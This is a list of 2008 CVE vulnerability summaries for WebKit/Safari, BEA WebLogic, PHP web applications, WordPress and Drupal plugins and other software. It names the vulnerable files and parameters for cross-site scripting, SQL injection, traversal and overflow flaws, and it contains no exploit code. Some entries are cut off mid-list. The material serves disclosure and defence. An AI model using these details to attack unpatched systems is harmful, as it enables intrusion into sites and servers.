[CVE-2008-1026] Integer overflow in the PCRE regular expression compiler (JavaScriptCore/pcre/pcre_compile.cpp) in Apple WebKit, as used in Safari before 3.1.1, allows remote attackers to execute arbitrary code via a regular expression with large, nested repetition counts, which triggers a heap-based buffer overflow.
[CVE-2008-1025] Cross-site scripting (XSS) vulnerability in Apple WebKit, as used in Safari before 3.1.1, allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a colon in the hostname portion.
[CVE-2008-1011] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via a frame that calls a method instance in another frame.
[CVE-2008-1010] Buffer overflow in WebKit, as used in Apple Safari before 3.1, allows remote attackers to execute arbitrary code via crafted regular expressions in JavaScript.
[CVE-2008-1009] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary JavaScript by modifying the history object.
[CVE-2008-1008] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via the document.domain property.
[CVE-2008-1007] WebCore, as used in Apple Safari before 3.1, does not enforce the frame navigation policy for Java applets, which allows remote attackers to conduct cross-site scripting (XSS) attacks.
[CVE-2008-1006] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML by using the window.open function to change the security context of a web page.
[CVE-2008-1005] WebCore, as used in Apple Safari before 3.1, does not properly mask the password field when reverse conversion is used with the Kotoeri input method, which allows physically proximate attackers to read the password.
[CVE-2008-1004] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the Web Inspector.
[CVE-2008-1003] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to sites that set the document.domain property or have the same document.domain.
[CVE-2008-1002] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1 allows remote attackers to inject arbitrary web script or HTML via a crafted javascript: URL.
[CVE-2008-1001] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1, when running on Windows XP or Vista, allows remote attackers to inject arbitrary web script or HTML via a crafted URL that is not properly handled in the error page.
[CVE-2008-0985] Heap-based buffer overflow in the GIF library in the WebKit framework for Google Android SDK m3-rc37a and earlier allows remote attackers to execute arbitrary code via a crafted GIF file whose logical screen height and width are different than the actual height and width.
[CVE-2008-0981] Open redirect vulnerability in spyce/examples/redirect.spy in Spyce - Python Server Pages (PSP) 2.1.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
[CVE-2008-0980] Multiple cross-site scripting (XSS) vulnerabilities in Spyce - Python Server Pages (PSP) 2.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the url or type parameter to docs/examples/redirect.spy
[CVE-2008-0971] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in Barracuda Spam Firewall (BSF) before 3.5.12.007, Message Archiver before 1.2.1.002, Web Filter before 3.3.0.052, IM Firewall before 3.1.01.017, and Load Balancer before 2.3.024 allow remote attackers to inject arbitrary web script or HTML via (1) the Policy Name field in Search Based Retention Policy in Message Archiver
[CVE-2008-0963] Format string vulnerability in EMC DiskXtender MediaStor 6.20.060 allows remote authenticated users to execute arbitrary code via a crafted message to the RPC interface.
[CVE-2008-0962] Stack-based buffer overflow in the File System Manager for EMC DiskXtender 6.20.060 allows remote authenticated users to execute arbitrary code via a crafted request to the RPC interface.
[CVE-2008-0961] EMC DiskXtender 6.20.060 has a hard-coded login and password, which allows remote attackers to bypass authentication via the RPC interface.
[CVE-2008-0956] Multiple stack-based buffer overflows in the BackWeb Lite Install Runner ActiveX control in the BackWeb Web Package ActiveX object in LiteInstActivator.dll in BackWeb before 8.1.1.87, as used in Logitech Desktop Manager (LDM) before 2.56, allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2008-0943] Multiple SQL injection vulnerabilities in Eagle Software Aeries Browser Interface (ABI) 3.7.2.2 allow remote attackers to execute arbitrary SQL commands via the (1) FC parameter to Comments.asp, or the Term parameter to (2) Labels.asp or (3) ClassList.asp.
[CVE-2008-0942] SQL injection vulnerability in GradebookStuScores.asp in Eagle Software Aeries Browser Interface (ABI) 3.8.2.8 allows remote attackers to execute arbitrary SQL commands via the GrdBk parameter.
[CVE-2008-0940] Cross-site scripting (XSS) vulnerability in Plain Black WebGUI before 7.4.24 allows remote attackers to inject arbitrary web script or HTML when creating a username, a different vulnerability than CVE-2007-0407.
[CVE-2008-0926] The SOAP interface to the eMBox module in Novell eDirectory 8.7.3.9 and earlier, and 8.8.x before 8.8.2, relies on client-side authentication, which allows remote attackers to bypass authentication via requests for /SOAP URIs, and cause a denial of service (daemon shutdown) or read arbitrary files. NOTE: it was later reported that 8.7.3.10 (aka 8.7.3 SP10) is also affected.
[CVE-2008-0919] Cross-site scripting (XSS) vulnerability in session/login.php in Open Source Security Information Management (OSSIM) 0.9.9 rc5 and earlier allows remote attackers to inject arbitrary web script or HTML via the dest parameter.
[CVE-2008-0917] Cross-site scripting (XSS) vulnerability in Tor World Tor Search 1.1 and earlier, I-Navigator 4.0, Mobile Frontier 2.1 and earlier, Diary.cgi (aka Quotes of the Day) 1.5 and earlier, Tor News 1.21 and earlier, Simple BBS 1.3 and earlier, Interactive BBS 1.3 and earlier, Tor Board 1.1 and earlier, Simple Vote 1.1 and earlier, and Com Vote 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0914] Multiple cross-site scripting (XSS) vulnerabilities in the Mediation server in IPdiva SSL VPN Server 2.2 before 2.2.8.84 and 2.3 before 2.3.2.14 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0913] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB or IP.Board) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via crafted BBCodes in an unspecified context.
[CVE-2008-0909] Cross-site scripting (XSS) vulnerability in browse.asp in Schoolwires Academic Portal allows remote attackers to inject arbitrary web script or HTML via the c parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0903] Unspecified vulnerability in the BEA WebLogic Server and Express proxy plugin, as distributed before November 2007 and before 9.2 MP3 and 10.0 MP2, allows remote attackers to cause a denial of service (web server crash) via a crafted URL.
[CVE-2008-0902] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and Express 6.1 through 10.0 MP1 allow remote attackers to inject arbitrary web script or HTML via unspecified samples. NOTE: this might be the same issue as CVE-2007-2694.
[CVE-2008-0901] BEA WebLogic Server and Express 7.0 through 10.0 allows remote attackers to conduct brute force password guessing attacks, even when account lockout has been activated, via crafted URLs that indicate whether a guessed password is successful or not.
[CVE-2008-0900] Session fixation vulnerability in BEA WebLogic Server and Express 8.1 SP4 through SP6, 9.2 through MP1, and 10.0 allows remote authenticated users to hijack web sessions via unknown vectors.
[CVE-2008-0899] Cross-site scripting (XSS) vulnerability in the Administration Console in BEA WebLogic Server and Express 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via URLs that are not properly handled by the Unexpected Exception Page.
[CVE-2008-0898] The distributed queue feature in JMS in BEA WebLogic Server 9.0 through 10.0, in certain configurations, does not properly handle when a client cannot send a message to a member of a distributed queue, which allows remote authenticated users to bypass intended access restrictions for protected distributed queues.
[CVE-2008-0897] Unspecified vulnerability in BEA WebLogic Server 9.0 through 10.0 allows remote authenticated users without "receive" permissions to bypass intended access restrictions and receive messages from a standalone JMS Topic or secured Distributed Topic member destination, related to durable subscriptions.
[CVE-2008-0896] BEA WebLogic Portal 10.0 and 9.2 through MP1, when an administrator deletes a single instance of a content portlet, removes entitlement policies for other content portlets, which allows attackers to bypass intended access restrictions.
[CVE-2008-0895] BEA WebLogic Server and WebLogic Express 6.1 through 10.0 allows remote attackers to bypass authentication for application servlets via crafted request headers.
[CVE-2008-0879] SQL injection vulnerability in modules.php in the Web_Links module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the cid parameter in a viewlink action.
[CVE-2008-0877] Multiple cross-site scripting (XSS) vulnerabilities in Jinzora Media Jukebox 2.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) frontend, (2) set_frontend, (3) jz_path, (4) theme, and (5) set_theme parameters to (a) index.php
[CVE-2008-0872] Cross-site scripting (XSS) vulnerability in SmarterTools SmarterMail Enterprise 4.3 allows remote attackers to inject arbitrary web script or HTML via a STYLE attribute of an element in the Subject field of an e-mail message.
[CVE-2008-0870] BEA WebLogic Portal 10.0 and 9.2 through Maintenance Pack 2, under certain circumstances, can redirect a user from the https:// URI for the Portal Administration Console to an http URI, which allows remote attackers to sniff the session.
[CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
[CVE-2008-0868] Cross-site scripting (XSS) vulnerability in Groupspace in BEA WebLogic Portal 10.0 and 9.2 through Maintenance Pack 1 allows remote authenticated users to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-0867] Cross-site scripting (XSS) vulnerability in portal/server.pt in BEA AquaLogic Interaction 6.1 through MP1 and Plumtree Foundation 6.0 through SP1 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2008-0866] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Workshop allow remote attackers to inject arbitrary web script or HTML via an invalid action URI, which is not properly handled by NetUI page flows.
[CVE-2008-0865] Unspecified vulnerability in BEA WebLogic Portal 8.1 through SP6 allows remote attackers to bypass entitlements for instances of a floatable WLP portlet via unknown vectors.
[CVE-2008-0864] Admin Tools in BEA WebLogic Portal 8.1 SP3 through SP6 can inadvertently remove entitlements for pages when an administrator edits the page definition label, which might allow remote attackers to bypass intended access restrictions.
[CVE-2008-0863] BEA WebLogic Server and WebLogic Express 9.0 and 9.1 exposes the web service's WSDL and security policies, which allows remote attackers to obtain sensitive information and potentially launch further attacks.
[CVE-2008-0861] Cross-site scripting (XSS) vulnerability in leg/Main.nsf in IBM Lotus Quickplace 7.0 allows remote attackers to inject arbitrary web script or HTML via an h_SearchString sub-parameter in the PreSetFields parameter of an EditDocument action.
[CVE-2008-0851] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to inscription.php, (2) courseCode parameter to main/calendar/myagenda.php, (3) category parameter to main/admin/course_category.php, (4) message parameter to main/admin/session_list.php in a show_message action, and (5) an avatar image to main/auth/profile.php.
[CVE-2008-0848] Cross-site scripting (XSS) vulnerability in lostsheep.php in Crafty Syntax Live Help (CSLH) before 2.14.16, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the versions claimed by the original researcher are probably incorrect.
[CVE-2008-0837] Cross-site scripting (XSS) vulnerability in the log feature in the John Godley Search Unleashed 0.2.10 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, which is not properly handled when the administrator views the log file.
[CVE-2008-0834] Cross-site scripting (XSS) vulnerability in Lotus Quickr for i5/OS before 8.0.0.2 Hotfix 11, when anonymous access is disabled on HTTP ports, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0828] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) attributes such as style and onmouseover in (a) forum post or (b) mail
[CVE-2008-0826] Cross-site scripting (XSS) vulnerability in Claroline before 1.8.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0820] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in index.php in Etomite 0.6.1.4 Final allows remote attackers to inject arbitrary web script or HTML via $_SERVER['PHP_INFO']. NOTE: the vendor disputes this issue in a followup, stating that the affected variable is $_SERVER['PHP_SELF'], and "This is not an Etomite specific exploit and I would like the report rescinded."
[CVE-2008-0813] Directory traversal vulnerability in Download.php in XPWeb 3.0.1, 3.3.2, and possibly other versions, allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter.
[CVE-2008-0809] Cross-site scripting (XSS) vulnerability in the htmlscrubber in Ikiwiki before 1.1.46 allows remote attackers to inject arbitrary web script or HTML via title contents.
[CVE-2008-0808] Cross-site scripting (XSS) vulnerability in the meta plugin in Ikiwiki before 1.1.47 allows remote attackers to inject arbitrary web script or HTML via meta tags.
[CVE-2008-0807] lib/Driver/sql.php in Turba 2 (turba2) Contact Manager H3 2.1.x before 2.1.7 and 2.2.x before 2.2-RC3, as used in products such as Horde Groupware before 1.0.4 and Horde Groupware Webmail Edition before 1.0.5, does not properly check access rights, which allows remote authenticated users to modify address data via a modified object_id parameter to edit.php, as demonstrated by modifying a personal address book entry when there is write access to a shared address book.
[CVE-2008-0798] Multiple directory traversal vulnerabilities in artmedic webdesign weblog 1.0, when magic_quotes_gpc is disabled, allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) ta parameter to artmedic_index.php, reached through index.php
[CVE-2008-0793] Multiple cross-site scripting (XSS) vulnerabilities in search.asp in Tendenci CMS allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) searchtext, (3) jobcategoryid, (4) contactcompany, and unspecified other parameters. NOTE: some of these details are obtained from third party information. NOTE: it is not clear whether this affects Tendenci Enterprise Edition in addition to the product's deployment on Tendenci's own server farm. If only the latter was affected, then this issue should not be included in CVE.
[CVE-2008-0783] Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7 before 0.8.7b and 0.8.6 before 0.8.6k allow remote attackers to inject arbitrary web script or HTML via (1) the view_type parameter to graph.php
[CVE-2008-0781] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin 1.5.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) message, (2) pagename, and (3) target filenames.
[CVE-2008-0780] Cross-site scripting (XSS) vulnerability in MoinMoin 1.5.x through 1.5.8 and 1.6.x before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the login action.
[CVE-2008-0775] Cross-site scripting (XSS) vulnerability in sboxDB.php in Simple Machines Forum (SMF) Shoutbox 1.14 through 1.16b allows remote attackers to inject arbitrary web script or HTML via strings to the shoutbox form that start with "&#", contain the desired script, and end with "
[CVE-2008-0774] Cross-site scripting (XSS) vulnerability in search.cgi in Loris Hotel Reservation System 3.01 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the hotel_name parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0769] Cross-site scripting (XSS) vulnerability in Livelink ECM 9.0.0 through 9.7.0 and possibly earlier does not set the charset, which allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input.
[CVE-2008-0765] Multiple cross-site scripting (XSS) vulnerabilities in artmedic webdesign weblog allow remote attackers to inject arbitrary web script or HTML via the (1) date parameter to artmedic_print.php and the (2) jahrneu parameter to index.php.
[CVE-2008-0757] Cross-site scripting (XSS) vulnerability in index.php in MercuryBoard 1.1.5 allows remote attackers to inject arbitrary web script or HTML via the message parameter (aka the message text area), which leads to an injection in the messenger during private message (PM) preview. NOTE: some of these details are obtained from third party information.
[CVE-2008-0751] Cross-site scripting (XSS) vulnerability in the Freetag before 2.96 plugin for S9Y Serendipity, when using Internet Explorer 6 or 7, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to plugin/tag/.
[CVE-2008-0749] Cross-site scripting (XSS) vulnerability in index.php in Calimero.CMS 3.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a calimero_webpage action.
[CVE-2008-0741] Unspecified vulnerability in the PropFilePasswordEncoder utility in IBM WebSphere Application Server (WAS) before 6.0.2 Fix Pack 25 (6.0.2.25) has unknown impact and attack vectors.
[CVE-2008-0740] IBM WebSphere Application Server (WAS) before 6.0.2 Fix Pack 25 (6.0.2.25) and 6.1 before Fix Pack 15 (6.1.0.15) writes unspecified cleartext information to http_plugin.log, which might allow local users to obtain sensitive information by reading this file.
[CVE-2008-0723] Cross-site scripting (XSS) vulnerability in mynews.inc.php in MyNews 1.6.4, and other earlier 1.6.x versions, allows remote attackers to inject arbitrary web script or HTML via the hash parameter in an admin action to index.php, a different vulnerability than CVE-2006-2208.1.
[CVE-2008-0722] Cross-site scripting (XSS) vulnerability in index.php in Pagetool 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the search_term parameter in a pagetool_search action. NOTE: the provenance of this information is unknown
[CVE-2008-0720] Cross-site scripting (XSS) vulnerability in Webmin 1.370 and 1.390 and Usermin 1.300 and 1.320 allows remote attackers to inject arbitrary web script or HTML via the search parameter to webmin_search.cgi (aka the search section), and possibly other components accessed through a "search box" or "open file box." NOTE: some of these details are obtained from third party information.
[CVE-2008-0717] Cross-site scripting (XSS) vulnerability in Caching Proxy (CP) 5.1 through 6.1 in IBM WebSphere Edge Server, when CGI mapping rules are enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger injection into an error response.
[CVE-2008-0700] Cross-site scripting (XSS) vulnerability in search.php in Crux Software CruxCMS 3.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0694] Cross-site scripting (XSS) vulnerability in the HTTP Server in IBM OS/400 V5R3M0 and V5R4M0 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header.
[CVE-2008-0691] Multiple cross-site scripting (XSS) vulnerabilities in admin_panel.php in the Simon Elvery WP-Footnotes 2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) wp_footnotes_current_settings[priority], (2) wp_footnotes_current_settings[style_rules], (3) wp_footnotes_current_settings[pre_footnotes], and (4) wp_footnotes_current_settings[post_footnotes] parameters.
[CVE-2008-0688] Cross-site scripting (XSS) vulnerability in catalog.php in Smartscript Domain Trader 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a viewcategory action.
[CVE-2008-0687] Cross-site scripting (XSS) vulnerability in siteadmin/editor_files/includes/load_message.php in the Youtube Clone Script allows remote attackers to inject arbitrary web script or HTML via the lang[please_wait] parameter.
[CVE-2008-0684] Cross-site scripting (XSS) vulnerability in ViewCat.php in iTechClassifieds 3.0 allows remote attackers to inject arbitrary web script or HTML via the CatID parameter.
[CVE-2008-0679] Cross-site scripting (XSS) vulnerability in index.php in BlogPHP 2.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2008-0676] Cross-site scripting (XSS) vulnerability in search.php in A-Blog 2 allows remote attackers to inject arbitrary web script or HTML via the words parameter.
[CVE-2008-0669] Cross-site scripting (XSS) vulnerability in search.cgi in Sift Unity allows remote attackers to inject arbitrary web script or HTML via the qt parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0666] Website META Language (WML) 2.0.11 allows local users to overwrite arbitrary files via a symlink attack on (1) the /tmp/pe.tmp.$$ temporary file used by wml_contrib/wmg.cgi and (2) temporary files used by wml_backend/p3_eperl/eperl_sys.c.
[CVE-2008-0665] wml_backend/p1_ipp/ipp.src in Website META Language (WML) 2.0.11 allows local users to overwrite arbitrary files via a symlink attack on the ipp.$$.tmp temporary file.
[CVE-2008-0656] Unrestricted file upload vulnerability in dmclTrace.jsp in EMC Documentum Administrator 5.3.0.313 and Webtop 5.3.0.317 allows remote attackers to overwrite arbitrary files via the filename attribute.
[CVE-2008-0645] Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/
[CVE-2008-0643] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 7 and ColdFusion 8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0642] Cross-site scripting (XSS) vulnerability in files created by Adobe RoboHelp 6 and 7, possibly involving use of a (1) WebHelp5 (WebHelp5Ext) or (2) WildFire (WildFireExt) extension, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-1280.
[CVE-2008-0622] Cross-site scripting (XSS) vulnerability in RaidenHTTPD 2.0.19 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the ulang parameter.
[CVE-2008-0618] Multiple cross-site scripting (XSS) vulnerabilities in the DMSGuestbook 1.8.0 and 1.7.0 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) gbname, (2) gbemail, (3) gburl, and (4) gbmsg parameters to unspecified programs. NOTE: the provenance of this information is unknown
[CVE-2008-0617] Multiple cross-site scripting (XSS) vulnerabilities in the DMSGuestbook 1.7.0 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter to wp-admin/admin.php, or the (2) messagefield parameter in the guestbook page, and the (3) title parameter in the messagearea.
[CVE-2008-0613] Open redirect vulnerability in htdocs/user.php in XOOPS 2.0.18 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the xoops_redirect parameter.
[CVE-2008-0609] Directory traversal vulnerability in index.php in DivideConcept VHD Web Pack 2.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.
[CVE-2008-0605] Multiple cross-site scripting (XSS) vulnerabilities in AstroSoft HelpDesk before 1.95.228 allow remote attackers to inject arbitrary web script or HTML via the (1) txtSearch parameter to operator/article/article_search_results.asp and the (2) Attach_Id parameter to operator/article/article_attachment.asp. NOTE: for vector 2, the XSS occurs in a forced SQL error message.
[CVE-2008-0595] dbus-daemon in D-Bus before 1.0.3, and 1.1.x before 1.1.20, recognizes send_interface attributes in allow directives in the security policy only for fully qualified method calls, which allows local users to bypass intended access restrictions via a method call with a NULL interface.
[CVE-2008-0594] Mozilla Firefox before 2.0.0.12 does not always display a web forgery warning dialog if the entire contents of a web page are in a DIV tag that uses absolute positioning, which makes it easier for remote attackers to conduct phishing attacks.
[CVE-2008-0585] sysmgt.websm.webaccess in IBM AIX 5.2 and 5.3 has world writable permissions for unspecified WebSM Remote Client files, which allows local users to "alter the behavior of" this client by overwriting these files.
[CVE-2008-0583] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Description and unspecified other metadata fields of a Metacafe movie submitted by Metacafe Pro to the Skype video gallery, accessible through a search within the (1) "Add video to chat" or (2) "Add video to mood" dialog, a different vector than CVE-2008-0454.
[CVE-2008-0582] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler.
[CVE-2008-0578] Cross-site scripting (XSS) vulnerability in the web management login page in Tripwire Enterprise 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0576] Cross-site scripting (XSS) vulnerability in the Project Issue Tracking module 5.x-2.x-dev before 20080130 in the 5.x-2.x series, 5.x-1.2 and earlier in the 5.x-1.x series, 4.7.x-2.6 and earlier in the 4.7.x-2.x series, and 4.7.x-1.6 and earlier in the 4.7.x-1.x series for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors that write to summary table pages.
[CVE-2008-0575] Cross-site request forgery (CSRF) vulnerability in admin/admincenter.php in webSPELL 4.01.02 allows remote attackers to assign the superadmin privilege level to arbitrary accounts as administrators via an "update member" action.
[CVE-2008-0574] Cross-site scripting (XSS) vulnerability in index.php in webSPELL 4.01.02 allows remote attackers to inject arbitrary web script or HTML via the sort parameter in a whoisonline action.
[CVE-2008-0572] Multiple PHP remote file inclusion vulnerabilities in Mindmeld 1.2.0.10 allow remote attackers to execute arbitrary PHP code via a URL in the MM_GLOBALS[home] parameter to (1) acweb/admin_index.php
[CVE-2008-0558] Cross-site scripting (XSS) vulnerability in Uniwin eCart Professional before 2.0.16 allows remote attackers to inject arbitrary web script or HTML via the rp parameter to cartView.asp and unspecified other components. NOTE: the provenance of this information is unknown
[CVE-2008-0552] Cross-site scripting (XSS) vulnerability in index.php in eTicket 1.5.6-RC4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2008-0551] The NamoInstaller.NamoInstall.1 ActiveX control in NamoInstaller.dll 3.0.0.1 and earlier in Namo Web Editor in Sejoong Namo ActiveSquare 6 allows remote attackers to execute arbitrary code via a URL in the argument to the Install method. NOTE: some of these details are obtained from third party information.
[CVE-2008-0547] Cross-site scripting (XSS) vulnerability in admin/utilities_ConfigHelp.asp in CandyPress (CP) 4.1.1.26, and probably earlier 4.x and 3.x versions, allows remote attackers to inject arbitrary web script or HTML via the helpfield parameter.
[CVE-2008-0541] Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) open and (2) date_show parameters.
[CVE-2008-0540] Multiple cross-site scripting (XSS) vulnerabilities in trixbox 2.4.2.0 allow remote attackers to inject arbitrary web script or HTML via the query string to index.php in (1) user/ or (2) maint/.
[CVE-2008-0539] Cross-site scripting (XSS) vulnerability in dms/policy/rep_request.php in F5 BIG-IP Application Security Manager (ASM) 9.4.3 allows remote attackers to inject arbitrary web script or HTML via the report_type parameter.
[CVE-2008-0536] Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563.
[CVE-2008-0533] Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors.
[CVE-2008-0524] Cross-site request forgery (CSRF) vulnerability in the management interface in multiple Yamaha RT series routers allows remote attackers to change password settings and probably other configuration settings as administrators via unspecified vectors.
[CVE-2008-0523] Multiple cross-site scripting (XSS) vulnerabilities in SoftCart.exe in SoftCart 5.1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) License_Plate, (2) License_State, (3) Ticket_Date, and (4) Ticket_Number parameters. NOTE: the provenance of this information is unknown
[CVE-2008-0522] Cross-site scripting (XSS) vulnerability in multiple Hal Networks shopping-cart products allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0505] Multiple cross-site scripting (XSS) vulnerabilities in docs/showdoc.php in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote attackers to inject arbitrary web script or HTML via the (1) h and (2) t parameters.
[CVE-2008-0497] Cross-site scripting (XSS) vulnerability in action.php in Nucleus CMS 3.31 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO, which is not quoted when processing PHP_SELF.
[CVE-2008-0496] Cross-site scripting (XSS) vulnerability in index.php in AmpJuke 0.7.0 allows remote attackers to inject arbitrary web script or HTML via the limit parameter in a search action.
[CVE-2008-0494] Cross-site scripting (XSS) vulnerability in vpnum/userslist.php in Endian Firewall 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the psearch parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0481] Directory traversal vulnerability in RTE_file_browser.asp in Web Wiz Rich Text Editor 4.0 allows remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter in a save action.
[CVE-2008-0480] Multiple directory traversal vulnerabilities in Web Wiz Forums 9.07 and earlier allow remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter to (1) RTE_file_browser.asp or (2) file_browser.asp.
[CVE-2008-0479] Directory traversal vulnerability in RTE_file_browser.asp in Web Wiz NewsPad 1.02 allows remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter.
[CVE-2008-0474] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 8.1 build 8100 allow remote attackers to inject arbitrary web script or HTML via the (1) showlink parameter to jsp/DiscoveryProfiles.jsp
[CVE-2008-0473] RTE_popup_save_file.asp in Web Wiz Rich Text Editor 4.0 allows remote attackers to upload (1) .html and (2) .htm files via unspecified vectors.
[CVE-2008-0466] RTE_file_browser.asp, as used in Web Wiz Rich Text Editor 4.0, Web Wiz Forums 9.07, and Web Wiz Newspad 1.02, does not require authentication, which allows remote attackers to list directories and read files. NOTE: this can be leveraged for listings outside the configured directory tree by exploiting a separate directory traversal vulnerability.
[CVE-2008-0463] Cross-site scripting (XSS) vulnerability in the Workflow 4.7.x before 4.7.x-1.2 and 5.x before 5.x-1.2 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving node properties.
[CVE-2008-0462] Cross-site scripting (XSS) vulnerability in the Archive 5.x before 5.x-1.8 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
